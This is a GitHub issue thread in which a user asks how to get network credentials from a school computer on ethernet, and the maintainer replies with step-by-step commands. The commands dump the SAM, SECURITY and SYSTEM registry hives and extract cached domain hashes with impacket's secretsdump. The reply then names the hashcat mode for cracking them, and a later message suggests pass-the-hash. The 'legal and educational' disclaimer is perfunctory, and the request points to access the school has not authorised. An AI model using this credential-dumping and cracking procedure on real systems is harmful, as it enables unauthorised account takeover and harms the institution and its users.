Gets credentials but with a ethernet conection

[Ardumine]

Hi! First of all, I'm really happy for this project to exist! I was able to use this in my laptop and i got the school Wi-Fi auth with no problem! But there is just one thing. How can i use this instead of a Wi-Fi connection, with an ethernet connection? What I'm trying to say is that this program gets the credentials from the Wi-Fi saved on the laptop, but i need it to get the credentials on an ethernet connection, in this case a school computer where i have Admin access. Is this possible?

Thanks, and sorry for my bad English :)

[ash47]

Hi, (I'll assume this is legal and for educational purposes, etc, etc) *The older the version of windows, the better your chances of success.* You're getting into the realm of pen testing now. Domain credentials are stored in SAM / SECURITY/ SYSTEM files. You can dump those files with an elevated command prompt: reg save HKLM\SAM "C:\Windows\Temp\sam.save" reg save HKLM\SECURITY "C:\Windows\Temp\security.save" reg save HKLM\SYSTEM "C:\Windows\Temp\system.save" Copy those files off the PC, those contain the cached domain credentials, you'll need to extract them and then crack them. # Offline dumping of LSA secrets from exported hives secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL # Offline dumping of SAM secrets from exported hives secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL # Offline dumping of SAM & LSA secrets from exported hives secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL Secrets dump script: https://github.com/fortra/impacket/blob/master/examples/secretsdump.py You're looking for something like $DCC2$10240#user#_hash_here In the LSA secrets, the same secrets will be local account hashes. You want to crack the hash with mode 2100 with hashcat: https://hashcat.net/wiki/doku.php?id=example_hashes There's enough info here to Google the rest. Best of luck with your legal and educational projects.

…

On Thu, 23 Nov 2023, 12:23 am Ardumine, ***@***.***> wrote: Hi! First of all, I'm really happy for this project to exist! I was able to use this in my laptop and i got the school Wi-Fi auth with no problem! But there is just one thing. How can i use this instead of a Wi-Fi connection, with an ethernet connection? What I'm trying to say is that this program gets the credentials from the Wi-Fi saved on the laptop, but i need it to get the credentials on an ethernet connection, in this case a school computer where i have Admin access. Is this possible? Thanks, and sorry for my bad English :) — Reply to this email directly, view it on GitHub <#16>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AA4UUDXMMY2BLMBRII5HQRTYFX4EDAVCNFSM6AAAAAA7WHNOPSVHI2DSMVQWIX3LMV43ASLTON2WKOZSGAYDMMZTGQ2TOOA> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[Ardumine]

Hi! Sorry for late response! After having the $DCC2$10240#user#_hash_here, can I import it directly to my computer without cracking the hash? Btw, thanks for the response!

[ash47]

I don't recall what kind of hash that is so I can't comment on it, but yeah, what you're asking about is similar to "pass the hash", and depending on what kind of hash it is, you can for sure just load it into your computer. I'm not sure what kind of hash this is though anymore.

…

On Fri, 1 Mar 2024, 10:28 pm Ardumine, ***@***.***> wrote: Hi! Sorry for late response! After having the $DCC2$10240#user#_hash_here, can I import it directly to my computer without cracking the hash? Btw, thanks for the response! — Reply to this email directly, view it on GitHub <#16 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AA4UUDWNRLKAVALLVPJ7QUDYWBQ5FAVCNFSM6AAAAAA7WHNOPSVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTSNZTGAYTQNJZHE> . You are receiving this because you commented.Message ID: ***@***.***>